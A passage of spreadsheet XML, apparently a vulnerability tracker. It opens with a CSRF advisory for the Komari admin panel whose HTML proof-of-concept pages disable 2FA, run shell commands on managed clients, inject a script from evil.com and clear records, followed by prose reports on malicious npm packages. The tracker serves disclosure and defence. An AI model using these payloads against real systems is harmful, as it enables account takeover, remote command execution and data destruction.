| `/api/admin/settings/` | POST | Modify system configuration |
| `/api/admin/upload/backup` | POST | Upload a malicious backup |
| `/api/admin/record/clear/all` | POST | Delete all monitoring records |
| `/api/admin/client/:uuid/edit` | POST | Modify client configuration |
| `/api/admin/client/:uuid/remove` | POST | Remove managed clients |
| `/api/admin/session/remove/all` | POST | Invalidate all active sessions |
| `/api/admin/settings/cloudflared/start` | POST | Start a Cloudflared tunnel |
## PoC 1 — Disable 2FA
```html
&lt;!DOCTYPE html&gt;
&lt;html&gt;
&lt;head&gt;&lt;title&gt;Loading...&lt;/title&gt;&lt;/head&gt;
&lt;body&gt;
&lt;iframe name="sink" style="display:none"&gt;&lt;/iframe&gt;
&lt;form id="f" method="POST"
      action="https://komari.example.com/api/admin/2fa/disable"
      target="sink"&gt;&lt;/form&gt;
&lt;script&gt;
  document.getElementById('f').submit();
&lt;/script&gt;
&lt;/body&gt;
&lt;/html&gt;
```
## PoC 2 — Remote Command Execution
```html
&lt;!DOCTYPE html&gt;
&lt;html&gt;
&lt;head&gt;&lt;title&gt;Loading...&lt;/title&gt;&lt;/head&gt;
&lt;body&gt;
&lt;script&gt;
var KOMARI = "https://komari.example.com";
var CMD    = "id &amp;&amp; hostname &amp;&amp; whoami";
fetch(KOMARI + "/api/admin/client/list", { credentials: "include" })
  .then(function(r){ return r.json(); })
  .then(function(data){
    var nodes = data.data || [];
    var uuids = [];
    for (var i = 0; i &lt; nodes.length; i++) {
      if (nodes[i].uuid) uuids.push(nodes[i].uuid);
    }
    if (uuids.length === 0) return;
    return fetch(KOMARI + "/api/admin/task/exec", {
      method: "POST",
      credentials: "include",
      headers: { "Content-Type": "application/json" },
      body: JSON.stringify({ command: CMD, clients: uuids })
    });
  });
&lt;/script&gt;
&lt;/body&gt;
&lt;/html&gt;
```
## PoC 3 — Modify System Configuration
```html
&lt;!DOCTYPE html&gt;
&lt;html&gt;
&lt;head&gt;&lt;title&gt;Loading...&lt;/title&gt;&lt;/head&gt;
&lt;body&gt;
&lt;script&gt;
var KOMARI = "https://komari.example.com";
fetch(KOMARI + "/api/admin/settings/", {
  method: "POST",
  credentials: "include",
  headers: { "Content-Type": "application/json" },
  body: JSON.stringify({
    "site_name": "Pwned",
    "custom_head": "&lt;script src='https://evil.com/hook.js'&gt;&lt;\/script&gt;"
  })
});
&lt;/script&gt;
&lt;/body&gt;
&lt;/html&gt;
```
## PoC 4 — Clear All Monitoring Records
```html
&lt;!DOCTYPE html&gt;
&lt;html&gt;
&lt;head&gt;&lt;title&gt;Loading...&lt;/title&gt;&lt;/head&gt;
&lt;body&gt;
&lt;iframe name="sink" style="display:none"&gt;&lt;/iframe&gt;
&lt;form id="f" method="POST"
      action="https://komari.example.com/api/admin/record/clear/all"
      target="sink"&gt;&lt;/form&gt;
&lt;script&gt;
document.getElementById('f').submit();
&lt;/script&gt;
&lt;/body&gt;
&lt;/html&gt;
```
## Verification Script
```bash
#!/bin/bash
KOMARI="${1:-https://komari.example.com}"
echo "=== CSRF Verification ==="
echo "[1] Cookie Attributes..."
curl -s -D - -o /dev/null \
  -X POST "$KOMARI/api/public/login" \
  -H "Content-Type: application/json" \
  -d '{"username":"test","password":"test"}' | grep -i 'set-cookie'
echo ""
echo "[2] CORS Headers..."
curl -s -D - -o /dev/null \
  -H "Origin: https://evil.com" \
  "$KOMARI/api/public/config" | grep -i 'access-control'
echo ""
echo "[3] CSRF Protection on Admin Endpoint..."
CODE=$(curl -s -o /dev/null -w "%{http_code}" \
  -X POST "$KOMARI/api/admin/settings/" \
  -H "Content-Type: application/json" \
  -H "Origin: https://evil.com" \
  -d '{}')
echo "    HTTP ${CODE} — A 401 response indicates that only session authentication is enforced and no CSRF protection is present."
```</t>
        </is>
      </c>
      <c r="S1321" s="6" t="inlineStr">
        <is>
          <t>https://github.com/advisories/GHSA-hxjg-93wc-h8p8</t>
        </is>
      </c>
    </row>
    <row r="1322">
      <c r="A1322" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1322" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1322" s="5" t="inlineStr">
        <is>
          <t>GHSA-mf7q-r4rv-jv94</t>
        </is>
      </c>
      <c r="D1322" s="5" t="inlineStr"/>
      <c r="E1322" s="5" t="inlineStr"/>
      <c r="F1322" s="5" t="inlineStr"/>
      <c r="G1322" s="5" t="inlineStr"/>
      <c r="H1322" s="5" t="inlineStr"/>
      <c r="I1322" s="5" t="inlineStr"/>
      <c r="J1322" s="5" t="inlineStr"/>
      <c r="K1322" s="5" t="inlineStr"/>
      <c r="L1322" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/crossplane/crossplane-runtime/v2</t>
        </is>
      </c>
      <c r="M1322" s="5" t="inlineStr">
        <is>
          <t>2.3.3, 2.4.0-rc.1</t>
        </is>
      </c>
      <c r="N1322" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1322" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1322" s="5" t="inlineStr"/>
      <c r="Q1322" s="5" t="inlineStr"/>
      <c r="R1322" s="5" t="inlineStr">
        <is>
          <t>Signature verification TOCTOU allows installing unverified package content in github.com/crossplane/crossplane-runtime/v2</t>
        </is>
      </c>
      <c r="S1322" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/GO-2026-6302</t>
        </is>
      </c>
    </row>
    <row r="1323">
      <c r="A1323" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1323" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C1323" s="5" t="inlineStr">
        <is>
          <t>GHSA-mqvm-gmc4-6rv2</t>
        </is>
      </c>
      <c r="D1323" s="5" t="inlineStr"/>
      <c r="E1323" s="5" t="inlineStr"/>
      <c r="F1323" s="5" t="inlineStr"/>
      <c r="G1323" s="5" t="inlineStr"/>
      <c r="H1323" s="5" t="inlineStr"/>
      <c r="I1323" s="5" t="inlineStr"/>
      <c r="J1323" s="5" t="inlineStr"/>
      <c r="K1323" s="5" t="inlineStr"/>
      <c r="L1323" s="5" t="inlineStr">
        <is>
          <t>nuget:Microsoft.DiaSymReader.Native</t>
        </is>
      </c>
      <c r="M1323" s="5" t="inlineStr">
        <is>
          <t>18.9.0-beta1.26405.2</t>
        </is>
      </c>
      <c r="N1323" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O1323" s="5" t="inlineStr"/>
      <c r="P1323" s="5" t="inlineStr"/>
      <c r="Q1323" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R1323" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="S1323" s="6" t="inlineStr">
        <is>
          <t>https://github.com/advisories/GHSA-mqvm-gmc4-6rv2</t>
        </is>
      </c>
    </row>
    <row r="1324">
      <c r="A1324" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1324" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1324" s="5" t="inlineStr">
        <is>
          <t>GHSA-p8f8-xjrg-2v4g</t>
        </is>
      </c>
      <c r="D1324" s="5" t="inlineStr"/>
      <c r="E1324" s="5" t="inlineStr"/>
      <c r="F1324" s="5" t="inlineStr"/>
      <c r="G1324" s="5" t="inlineStr"/>
      <c r="H1324" s="5" t="inlineStr"/>
      <c r="I1324" s="5" t="inlineStr"/>
      <c r="J1324" s="5" t="inlineStr"/>
      <c r="K1324" s="5" t="inlineStr"/>
      <c r="L1324" s="5" t="inlineStr">
        <is>
          <t>npm:vinnleys</t>
        </is>
      </c>
      <c r="M1324" s="5" t="inlineStr"/>
      <c r="N1324" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1324" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1324" s="5" t="inlineStr"/>
      <c r="Q1324" s="5" t="inlineStr"/>
      <c r="R1324" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (da2c109f5566555ce8963688bfbb309220aa3fca570bcee74d32b1a8fcc83c75)
The package was found to contain malicious code or consuming dependency that contains malicious code
## Source: ghsa-malware (9b08fe0df49484a21e53ee26da4ba43b548f0424d59c77a7258f64fa972a574d)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24" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16092</t>
        </is>
      </c>
    </row>
    <row r="1325">
      <c r="A1325" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1325" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1325" s="5" t="inlineStr">
        <is>
          <t>GHSA-q246-72rh-fp8w</t>
        </is>
      </c>
      <c r="D1325" s="5" t="inlineStr"/>
      <c r="E1325" s="5" t="inlineStr"/>
      <c r="F1325" s="5" t="inlineStr"/>
      <c r="G1325" s="5" t="inlineStr"/>
      <c r="H1325" s="5" t="inlineStr"/>
      <c r="I1325" s="5" t="inlineStr"/>
      <c r="J1325" s="5" t="inlineStr"/>
      <c r="K1325" s="5" t="inlineStr"/>
      <c r="L1325" s="5" t="inlineStr">
        <is>
          <t>npm:@haimiya/baileys</t>
        </is>
      </c>
      <c r="M1325" s="5" t="inlineStr"/>
      <c r="N1325" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1325" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1325" s="5" t="inlineStr"/>
      <c r="Q1325" s="5" t="inlineStr"/>
      <c r="R1325" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (afb1fac619ba416b14b747307762d4e4cf1cfc41f00a244c8e472af5f689deb0)
The package was found to contain malicious code or consuming dependency that contains malicious code
## Source: ghsa-malware (fd6c3f53f36ea4839df1170d4f08455005be34649d64b567f621b47b13b0760e)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25" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16066</t>
        </is>
      </c>
    </row>
    <row r="1326">
      <c r="A1326" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1326" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1326" s="5" t="inlineStr">
        <is>
          <t>GHSA-qmw2-mp2f-cgg3</t>
        </is>
      </c>
      <c r="D1326" s="5" t="inlineStr"/>
      <c r="E1326" s="5" t="inlineStr"/>
      <c r="F1326" s="5" t="inlineStr"/>
      <c r="G1326" s="5" t="inlineStr"/>
      <c r="H1326" s="5" t="inlineStr"/>
      <c r="I1326" s="5" t="inlineStr"/>
      <c r="J1326" s="5" t="inlineStr"/>
      <c r="K1326" s="5" t="inlineStr"/>
      <c r="L1326" s="5" t="inlineStr">
        <is>
          <t>npm:@auction-fe/portal</t>
        </is>
      </c>
      <c r="M1326" s="5" t="inlineStr"/>
      <c r="N1326" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1326" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1326" s="5" t="inlineStr"/>
      <c r="Q1326" s="5" t="inlineStr"/>
      <c r="R1326" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: ghsa-malware (c9a0273cadda58738fa01d0c67fb17edd588f5870a13128a4aa47820f6a13fab)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26" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16107</t>
        </is>
      </c>
    </row>
    <row r="1327">
      <c r="A1327" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1327" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1327" s="5" t="inlineStr">
        <is>
          <t>GHSA-v5v6-h869-g34f</t>
        </is>
      </c>
      <c r="D1327" s="5" t="inlineStr"/>
      <c r="E1327" s="5" t="inlineStr"/>
      <c r="F1327" s="5" t="inlineStr"/>
      <c r="G1327" s="5" t="inlineStr"/>
      <c r="H1327" s="5" t="inlineStr"/>
      <c r="I1327" s="5" t="inlineStr"/>
      <c r="J1327" s="5" t="inlineStr"/>
      <c r="K1327" s="5" t="inlineStr"/>
      <c r="L1327" s="5" t="inlineStr">
        <is>
          <t>npm:crypto-validates</t>
        </is>
      </c>
      <c r="M1327" s="5" t="inlineStr"/>
      <c r="N1327" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1327" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1327" s="5" t="inlineStr"/>
      <c r="Q1327" s="5" t="inlineStr"/>
      <c r="R1327" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">crypto-validates@0.0.2 ships a dist/index.js identical to polygon-toolkits-validator@1.1.4: validate(input) base64-encodes its argument and POSTs it to https://raydium-clmm.maingoal.xyz/v1/check through check_validator(), and randomBytes(size) forwards freshly generated crypto.randomBytes output to the same host before returning it. Nothing runs on install or import; the send happens on the first call. The README claims the package contains only type definitions. Same publisher (luisdary) as raydium-clmm-sdk and pumpswap-sdk-v1.
---
_-= Per source details. Do not edit below this line.=-_
## Source: ghsa-malware (11ed61288a3d0f6dece3dd31a0a5e820fe80b970dfc25f83fc2f0a0653018d6e)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27" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16085</t>
        </is>
      </c>
    </row>
    <row r="1328">
      <c r="A1328" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1328" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1328" s="5" t="inlineStr">
        <is>
          <t>GHSA-vfrg-29g4-854p</t>
        </is>
      </c>
      <c r="D1328" s="5" t="inlineStr"/>
      <c r="E1328" s="5" t="inlineStr"/>
      <c r="F1328" s="5" t="inlineStr"/>
      <c r="G1328" s="5" t="inlineStr"/>
      <c r="H1328" s="5" t="inlineStr"/>
      <c r="I1328" s="5" t="inlineStr"/>
      <c r="J1328" s="5" t="inlineStr"/>
      <c r="K1328" s="5" t="inlineStr"/>
      <c r="L1328" s="5" t="inlineStr">
        <is>
          <t>npm:xbailsync</t>
        </is>
      </c>
      <c r="M1328" s="5" t="inlineStr"/>
      <c r="N1328" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1328" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1328" s="5" t="inlineStr"/>
      <c r="Q1328" s="5" t="inlineStr"/>
      <c r="R1328" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (18ff4aa1a565659c7106700fc5b7c355770ec8fc6bd62c0d9a4f8efce56bf09f)
The package was found to contain malicious code or consuming dependency that contains malicious code
## Source: ghsa-malware (37b2c945ecd2da7d2c6d4987cf7101250483335439ac0d5f2ac94937643cd61a)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28" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16093</t>
        </is>
      </c>
    </row>
    <row r="1329">
      <c r="A1329" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1329" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1329" s="5" t="inlineStr">
        <is>
          <t>GHSA-w6hj-c25h-wgh7</t>
        </is>
      </c>
      <c r="D1329" s="5" t="inlineStr"/>
      <c r="E1329" s="5" t="inlineStr"/>
      <c r="F1329" s="5" t="inlineStr"/>
      <c r="G1329" s="5" t="inlineStr"/>
      <c r="H1329" s="5" t="inlineStr"/>
      <c r="I1329" s="5" t="inlineStr"/>
      <c r="J1329" s="5" t="inlineStr"/>
      <c r="K1329" s="5" t="inlineStr"/>
      <c r="L1329" s="5" t="inlineStr">
        <is>
          <t>npm:@auction-fe/base</t>
        </is>
      </c>
      <c r="M1329" s="5" t="inlineStr"/>
      <c r="N1329" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1329" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1329" s="5" t="inlineStr"/>
      <c r="Q1329" s="5" t="inlineStr"/>
      <c r="R1329" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: ghsa-malware (4430765bbffe0f1b4471a3d1dbafdbc97059e7717fc6a1967fd5ebf05b83a0ef)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29" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16106</t>
        </is>
      </c>
    </row>
    <row r="1330">
      <c r="A1330" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1330" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1330" s="5" t="inlineStr">
        <is>
          <t>GHSA-xm59-fwxf-vq6g</t>
        </is>
      </c>
      <c r="D1330" s="5" t="inlineStr"/>
      <c r="E1330" s="5" t="inlineStr"/>
      <c r="F1330" s="5" t="inlineStr"/>
      <c r="G1330" s="5" t="inlineStr"/>
      <c r="H1330" s="5" t="inlineStr"/>
      <c r="I1330" s="5" t="inlineStr"/>
      <c r="J1330" s="5" t="inlineStr"/>
      <c r="K1330" s="5" t="inlineStr"/>
      <c r="L1330" s="5" t="inlineStr">
        <is>
          <t>npm:graphql-js-client-transform</t>
        </is>
      </c>
      <c r="M1330" s="5" t="inlineStr"/>
      <c r="N1330" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1330" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1330" s="5" t="inlineStr"/>
      <c r="Q1330" s="5" t="inlineStr"/>
      <c r="R1330" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: ghsa-malware (8c11b1672f9929aa10893cab85bc0f4e9a5ae5adfc2c8ae637d45e61b644692b)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30" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16086</t>
        </is>
      </c>
    </row>
    <row r="1331">
      <c r="A1331" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1331" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1331" s="5" t="inlineStr">
        <is>
          <t>GHSA-xqx8-w483-rq8x</t>
        </is>
      </c>
      <c r="D1331" s="5" t="inlineStr"/>
      <c r="E1331" s="5" t="inlineStr"/>
      <c r="F1331" s="5" t="inlineStr"/>
      <c r="G1331" s="5" t="inlineStr"/>
      <c r="H1331" s="5" t="inlineStr"/>
      <c r="I1331" s="5" t="inlineStr"/>
      <c r="J1331" s="5" t="inlineStr"/>
      <c r="K1331" s="5" t="inlineStr"/>
      <c r="L1331" s="5" t="inlineStr">
        <is>
          <t>npm:sams-text-style</t>
        </is>
      </c>
      <c r="M1331" s="5" t="inlineStr"/>
      <c r="N1331" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1331" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1331" s="5" t="inlineStr"/>
      <c r="Q1331" s="5" t="inlineStr"/>
      <c r="R1331" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: ghsa-malware (f81a7140e2d1a61a8bb4c6594ad8b75cadab20788d22005d9bf026d834c2e626)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331" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16091</t>
        </is>
      </c>
    </row>
    <row r="1332">
      <c r="A1332" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1332" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1332" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16053</t>
        </is>
      </c>
      <c r="D1332" s="5" t="inlineStr"/>
      <c r="E1332" s="5" t="inlineStr"/>
      <c r="F1332" s="5" t="inlineStr"/>
      <c r="G1332" s="5" t="inlineStr"/>
      <c r="H1332" s="5" t="inlineStr"/>
      <c r="I1332" s="5" t="inlineStr"/>
      <c r="J1332" s="5" t="inlineStr"/>
      <c r="K1332" s="5" t="inlineStr"/>
      <c r="L1332" s="5" t="inlineStr">
        <is>
          <t>npm:file-type-detector</t>
        </is>
      </c>
      <c r="M1332" s="5" t="inlineStr"/>
      <c r="N1332" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1332" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1332" s="5" t="inlineStr"/>
      <c r="Q1332" s="5" t="inlineStr"/>
      <c r="R1332" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (04917bd7fc156dcb9793cb1f1d06ed0f2d0cb1b3aa4b04431dea54ed71f6be72)
A clone of file-type-checker with one function added: isSign(name, moduleName, offset) in dist/validation/image.js reads public/${name}.png from the working directory, splits the buffer at -offset, and writes the trailing payload to../../../{moduleName}/log - a sibling package under node_modules - then returns isPNG() so the caller sees a plausible boolean. It is undocumented, reachable only via an __exportStar wildcard so it is never named in dist/index.js, and fails silently on try/catch.
Drop stage of a three-package chain: file-type-detector writes the payload, gloggo (1.1.2-1.1.4) executes it via require('./log'), and sonmors (typosquat of sonner) triggers the chain by requiring gloggo. gloggo shares the npm publisher log-developer and was published five minutes apart on 2026-08-27. No install hooks; execution occurs on require().
</t>
        </is>
      </c>
      <c r="S1332" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16053</t>
        </is>
      </c>
    </row>
    <row r="1333">
      <c r="A1333" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1333" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1333" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16054</t>
        </is>
      </c>
      <c r="D1333" s="5" t="inlineStr"/>
      <c r="E1333" s="5" t="inlineStr"/>
      <c r="F1333" s="5" t="inlineStr"/>
      <c r="G1333" s="5" t="inlineStr"/>
      <c r="H1333" s="5" t="inlineStr"/>
      <c r="I1333" s="5" t="inlineStr"/>
      <c r="J1333" s="5" t="inlineStr"/>
      <c r="K1333" s="5" t="inlineStr"/>
      <c r="L1333" s="5" t="inlineStr">
        <is>
          <t>npm:gloggo</t>
        </is>
      </c>
      <c r="M1333" s="5" t="inlineStr"/>
      <c r="N1333" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1333" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1333" s="5" t="inlineStr"/>
      <c r="Q1333" s="5" t="inlineStr"/>
      <c r="R1333" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (a333f8ded17af0754357d938933ee95e9ab1f857cc875948d49cb9b26992e75d)
gloggo impersonates the legitimate gulpjs 'glogg' logging library by copying its README, shields, and LICENSE text (attributed to Blaine Bublitz), while package.json attributes authorship to 'Blockvora Team &lt;team@blockvora.com&gt;' with repository 'blockvora/gloggo'. The package name is a one-character variant of 'glogg'. getLogger() invokes isSign('favorite','gloggo',12467) from the dependency 'file-type-detector' and, when that gate returns truthy, executes require('./log'). The './log' module is not present in the tarball, so its bytes must be produced or supplied at require time by the dependency. A logging utility has no legitimate reason to gate its loader on an opaque file-signature check from an unrelated third-party dependency, and the gated path executes code that is not part of the shipped package contents. Consumers who install gloggo believing it to be glogg import a typosquat that conditionally runs code sourced from a suspicious sibling dependency when the module is required.
</t>
        </is>
      </c>
      <c r="S1333" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16054</t>
        </is>
      </c>
    </row>
    <row r="1334">
      <c r="A1334" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1334" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1334" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16055</t>
        </is>
      </c>
      <c r="D1334" s="5" t="inlineStr"/>
      <c r="E1334" s="5" t="inlineStr"/>
      <c r="F1334" s="5" t="inlineStr"/>
      <c r="G1334" s="5" t="inlineStr"/>
      <c r="H1334" s="5" t="inlineStr"/>
      <c r="I1334" s="5" t="inlineStr"/>
      <c r="J1334" s="5" t="inlineStr"/>
      <c r="K1334" s="5" t="inlineStr"/>
      <c r="L1334" s="5" t="inlineStr">
        <is>
          <t>npm:sonmors</t>
        </is>
      </c>
      <c r="M1334" s="5" t="inlineStr"/>
      <c r="N1334" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1334" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1334" s="5" t="inlineStr"/>
      <c r="Q1334" s="5" t="inlineStr"/>
      <c r="R1334" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (66e21634e32b7d24357ad667703da4ddeb42542ed9fc6a3ed28c7257d2e27fca)
Package `sonmors` ships a near-copy of the `sonner` React toast library and spoofs sonner's identity in package.json (author `Emil Kowalski &lt;e@emilkowal.ski&gt;`, homepage `sonner.emilkowal.ski`, repository `github.com/emilkowalski/sonner`) while being published under a different name. The only functional divergence from sonner in the shipped `dist/index.js` is a top-level `const getLogger = require('gloggo'); var logger = getLogger('Log');` and a `logger.infO('useSonner')` call inside the exported hook. `require('gloggo')` executes on every `require('sonmors')`, so any consumer who mistypes `sonner` as `sonmors` pulls in and runs whatever the companion `gloggo` package contains at library-load time. The payload lives in the transitive dependency rather than in this tarball; the lure is the impersonated identity and the near-perfect sonner clone.
</t>
        </is>
      </c>
      <c r="S1334" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16055</t>
        </is>
      </c>
    </row>
    <row r="1335">
      <c r="A1335" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1335" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1335" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16059</t>
        </is>
      </c>
      <c r="D1335" s="5" t="inlineStr"/>
      <c r="E1335" s="5" t="inlineStr"/>
      <c r="F1335" s="5" t="inlineStr"/>
      <c r="G1335" s="5" t="inlineStr"/>
      <c r="H1335" s="5" t="inlineStr"/>
      <c r="I1335" s="5" t="inlineStr"/>
      <c r="J1335" s="5" t="inlineStr"/>
      <c r="K1335" s="5" t="inlineStr"/>
      <c r="L1335" s="5" t="inlineStr">
        <is>
          <t>npm:rojo-rbx</t>
        </is>
      </c>
      <c r="M1335" s="5" t="inlineStr"/>
      <c r="N1335" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1335" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1335" s="5" t="inlineStr"/>
      <c r="Q1335" s="5" t="inlineStr"/>
      <c r="R1335" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (8bf25c0dd3a1b933c3ee2fe887301590c3b92e383a1e6c380fcdb9544578720b)
The package impersonates the legitimate Rojo Roblox tooling project. Its npm install lifecycle runs scripts/install.js, which on Windows downloads a VBScript from the hardcoded URL https://l81.me/updater.vbs, writes it to %APPDATA%\Rojo\rojo-sync.vbs, and executes it hidden via wscript.exe //B. The script then adds an HKCU\Software\Microsoft\Windows\CurrentVersion\Run entry named RojoClientSync that re-launches the dropped VBS on every user login, giving the fetched payload boot persistence independent of the package. The remote URL, wscript.exe, //B flag, target directory, file name, registry path, and value name are all reconstructed at runtime from String.fromCharCode numeric arrays via a _d() helper to evade static review. The shipped bin only prints --version/--help and provides no functional Rojo CLI; the manifest points at github.com/Unreal-Works/rojo-npm rather than the real rojo-rbx/rojo project. The dropper is the package's only real behavior.
</t>
        </is>
      </c>
      <c r="S1335" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16059</t>
        </is>
      </c>
    </row>
    <row r="1336">
      <c r="A1336" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1336" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1336" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16060</t>
        </is>
      </c>
      <c r="D1336" s="5" t="inlineStr"/>
      <c r="E1336" s="5" t="inlineStr"/>
      <c r="F1336" s="5" t="inlineStr"/>
      <c r="G1336" s="5" t="inlineStr"/>
      <c r="H1336" s="5" t="inlineStr"/>
      <c r="I1336" s="5" t="inlineStr"/>
